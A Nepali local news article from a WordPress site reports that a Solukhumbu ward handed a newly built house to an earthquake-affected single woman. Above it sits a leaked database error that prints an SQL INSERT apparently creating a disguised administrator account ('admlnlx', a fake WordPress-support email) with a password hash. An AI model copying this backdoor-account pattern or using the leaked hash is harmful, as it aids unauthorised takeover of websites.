WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bg2c0XA5OWAKnerl9iegO9QGerIh1u0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 21:51:20', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, सोलुखुम्बु । थुलुङदुधकोशी गाउँपालिका ९ नम्बर वडाले भुकम्प पिडित एकल महिलालाई घर निर्माण गरि हस्तान्तरण गरेको छ । एक कार्यक्रम बीच गाउँपालिका अध्यक्ष असिम राईले स्थानिय रत्न कुमारी राईलाई घर हस्तान्तरण गर्नु भएको हो ।
एकल महिला तथा सन्तानहरु पनि सुस्त मनस्थीतिका रहेकाले वडा कार्यालयले २ लाख तथा भुकम्प लाभग्राहिको ३ लाखबाट भवन निर्माण गरि हस्तान्तरण गरिएको वडाध्यक्ष भुपाल सिङ राइले बताए । उक्त घर निर्माणको लागि आफूले गर्न नसक्ने भएकोले वडाले नै सबै काम गरेको पनि वडा अध्यक्ष राईले बताए ।